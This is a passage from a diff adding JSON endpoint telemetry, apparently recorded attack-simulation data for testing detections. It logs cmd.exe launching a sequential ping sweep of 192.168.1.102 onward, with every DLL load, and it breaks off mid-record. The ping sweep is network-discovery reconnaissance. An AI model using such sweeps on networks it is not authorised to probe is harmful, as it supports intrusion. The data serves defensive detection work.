"image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572472140000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "event_type": "process", + "pid": 976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572476840000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-0010BE855201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.102", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5012, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572476980000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "event_type": "process", + "pid": 5012, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572481830000, + "unique_pid": "{42FC7E13-CB7F-5C05-0000-00102E885201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.103", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572481980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572481990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "event_type": "process", + "pid": 1976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572486840000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-0010AE8A5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.104", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7916, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572486980000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "event_type": "process", + "pid": 7916, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572491990000, + "unique_pid": "{42FC7E13-CB80-5C05-0000-00101D8D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.105", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8152, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572492130000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572492140000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "event_type": "process", + "pid": 8152, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572496840000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00109B8F5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.106", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6008, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572496980000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "event_type": "process", + "pid": 6008, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572501990000, + "unique_pid": "{42FC7E13-CB81-5C05-0000-00100E925201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.107", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4128, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572502140000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "event_type": "process", + "pid": 4128, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572506840000, + "unique_pid": "{42FC7E13-CB82-5C05-0000-00108C945201}" + }, + { + "command_line": "ping -n 